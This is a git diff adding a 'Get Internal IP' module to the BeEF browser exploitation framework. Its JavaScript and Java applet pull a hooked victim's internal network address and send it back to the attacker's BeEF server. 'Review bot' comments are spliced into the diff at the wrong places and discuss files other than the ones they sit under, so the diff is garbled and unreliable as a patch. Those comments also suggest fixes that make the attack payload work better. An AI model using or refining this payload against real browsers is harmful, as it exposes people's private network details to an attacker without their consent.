diff --git a/modules/host/get_internal_ip/command.js b/modules/host/get_internal_ip/command.js
new file mode 100755
index 000000000..abc000788
--- /dev/null
+++ b/modules/host/get_internal_ip/command.js
@@ -0,0 +1,42 @@
+//
+// Copyright 2012 Wade Alcorn wade@bindshell.net
+//
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+// http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+//
+beef.execute(function() {
+
+ var applet_uri = 'http://'+beef.net.host+ ':' + beef.net.port + '/';
+ var output;
+ beef.dom.attachApplet('get_internal_ip', 'get_internal_ip', 'get_internal_ip' ,
+ applet_uri, null, null);
+
+ function waituntilok() {
+ try {
+ output = document.get_internal_ip.ip();
+ beef.net.send('<%= @command_url %>', <%= @command_id %>, output);
+ beef.dom.detachApplet('get_internal_ip');
+ return;
+ } catch (e) {
+ internal_counter++;
+ if (internal_counter > timeout) {
+ beef.net.send('<%= @command_url %>', <%= @command_id %>, 'Timeout after '+timeout+' seconds');
+ beef.dom.detachApplet('get_internal_ip');
+ return;
+ }
+ setTimeout(function() {waituntilok()},1000);
+ }
+ }
+
+ setTimeout(function() {waituntilok()},5000);
+
+});
diff --git a/modules/host/get_internal_ip/config.yaml b/modules/host/get_internal_ip/config.yaml
new file mode 100755
index 000000000..68a4d63c3
--- /dev/null
+++ b/modules/host/get_internal_ip/config.yaml
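Review bot: `internal_counter` and `timeout` are read in the `catch` branch of `waituntilok` but are never declared anywhere in the file, so the first failed `document.get_internal_ip.ip()` call makes `internal_counter++` throw a ReferenceError out of the catch block and neither the retry nor the "Timeout after" message ever runs. Declare them next to `output`, e.g. `var internal_counter = 0;` and `var timeout = 30;` (pick the intended wait in seconds, since the timeout message reports the value as seconds and retries fire every 1000 ms). The `return;` at the end of the `try` block is redundant and can be dropped.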
@@ -0,0 +1,26 @@
+#
+# Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+#
+beef:
+ module:
+ get_internal_ip:
+ enable: true
+ category: "Host"
+ name: "Get Internal IP"
+ description: "Retrieve the internal (behind NAT) IP address of the victim machine using an unsigned Java applet"
+ authors: ["antisnatchor"]
+ target:
+ working: ["IE", "FF", "O"]
+ user_notify: ["C", "S"]
diff --git a/modules/host/get_internal_ip/get_internal_ip.class b/modules/host/get_internal_ip/get_internal_ip.class
new file mode 100755
index 000000000..ee31c505b
Binary files /dev/null and b/modules/host/get_internal_ip/get_internal_ip.class differ
diff --git a/modules/host/get_internal_ip/get_internal_ip.java b/modules/host/get_internal_ip/get_internal_ip.java
new file mode 100755
index 000000000..2882d1de1
--- /dev/null
+++ b/modules/host/get_internal_ip/get_internal_ip.java
@@ -0,0 +1,49 @@
+import java.applet.Applet;
+import java.applet.AppletContext;
+import java.net.InetAddress;
+import java.net.Socket;
+
+/* to compiled it in MacOSX SnowLeopard/Lion:
+* javac -cp /System/Library/Frameworks/JavaVM.framework/Resources/Deploy.bundle/Contents/Resources/Java/plugin.jar get_internal_ip.java
+* author: antisnatchor (adapted from Lars Kindermann applet)
+*/
+public class get_internal_ip extends Applet {
+ String Ip = "unknown";
+ String internalIp = "unknown";
+ String IpL = "unknown";
+
+ private String MyIP(boolean paramBoolean) {
+ Object obj = "unknown";
+ String str2 = getDocumentBase().getHost();
+ int i = 80;
+ if (getDocumentBase().getPort() != -1) i = getDocumentBase().getPort();
+ try {
+ String str1 = new Socket(str2, i).getLocalAddress().getHostAddress();
+ if (!str1.equals("255.255.255.255")) obj = str1;
+ } catch (SecurityException localSecurityException) {
+ obj = "FORBIDDEN";
+ } catch (Exception localException1) {
+ obj = "ERROR";
+ }
+ if (paramBoolean) try {
+ obj = new Socket(str2, i).getLocalAddress().getHostName();
+ } catch (Exception localException2) {
+ }
+ return (String) obj;
+ }
+
+ public void init() {
+ this.Ip = MyIP(false);
+ }
+
+ public String ip() {
+ return this.Ip;
+ }
+
+ public String internalIp() {
+ return this.internalIp;
+ }
+
+ public void start() {
+ }
+}
\ No newline at end of file
diff --git a/modules/host/get_internal_ip/module.rb b/modules/host/get_internal_ip/module.rb
new file mode 100755
index 000000000..cb950806a
--- /dev/null
+++ b/modules/host/get_internal_ip/module.rb
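Review bot: The `Socket` opened in `MyIP` is never closed — `new Socket(str2, i)` is used only for `getLocalAddress()` and then dropped, and the same happens in the `paramBoolean` hostname branch — so each applet `init()` leaks a connection to the BeEF host. Keep a reference and close it in a `finally`, as sketched below, and apply the same to the second `new Socket`. `internalIp` is never assigned so `internalIp()` always returns `"unknown"`, and `IpL`, `AppletContext` and `InetAddress` are unused; either wire them up or delete them. The header comment should read `to compile it`.
```java
    private String MyIP(boolean paramBoolean) {
        // … unchanged: obj / str2 / i setup …
        Socket sock = null;
        try {
            sock = new Socket(str2, i);
            String str1 = sock.getLocalAddress().getHostAddress();
            if (!str1.equals("255.255.255.255")) obj = str1;
        } catch (SecurityException localSecurityException) {
            obj = "FORBIDDEN";
        } catch (Exception localException1) {
            obj = "ERROR";
        } finally {
            if (sock != null) try { sock.close(); } catch (Exception ignored) {}
        }
        // … unchanged: optional hostname lookup and return …
```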
@@ -0,0 +1,35 @@
+#
+# Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+#
+class Get_internal_ip < BeEF::Core::Command
+
+ def pre_send
+ BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/host/get_internal_ip/get_internal_ip.class', '/get_internal_ip', 'class')
+ end
+
+ #def self.options
+ # return [
+ # { 'name' => 'applet_name', 'description' => 'Applet Name', 'ui_label'=>'Number', 'value' =>'5551234','width' => '200px' },
+ # ]
+ #end
+
+ def post_execute
+ content = {}
+ content['Result'] = @datastore['result']
+ save content
+ BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.unbind('/get_internal_ip.class')
+ end
+
+end
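Review bot: The commented-out `self.options` stub between `pre_send` and `post_execute` is dead code in a brand-new file and should be deleted rather than committed. `pre_send` binds the asset as `'/get_internal_ip'` with extension `'class'` while `post_execute` unbinds `'/get_internal_ip.class'`; that only lines up if `AssetHandler#bind` composes the served path from those two arguments, so confirm it or bind and unbind with the same literal. Unbinding in `post_execute` also removes the applet as soon as the first hooked browser reports back, which looks like it would break a second browser still executing the module; if that is intended, a one-line comment saying so would help.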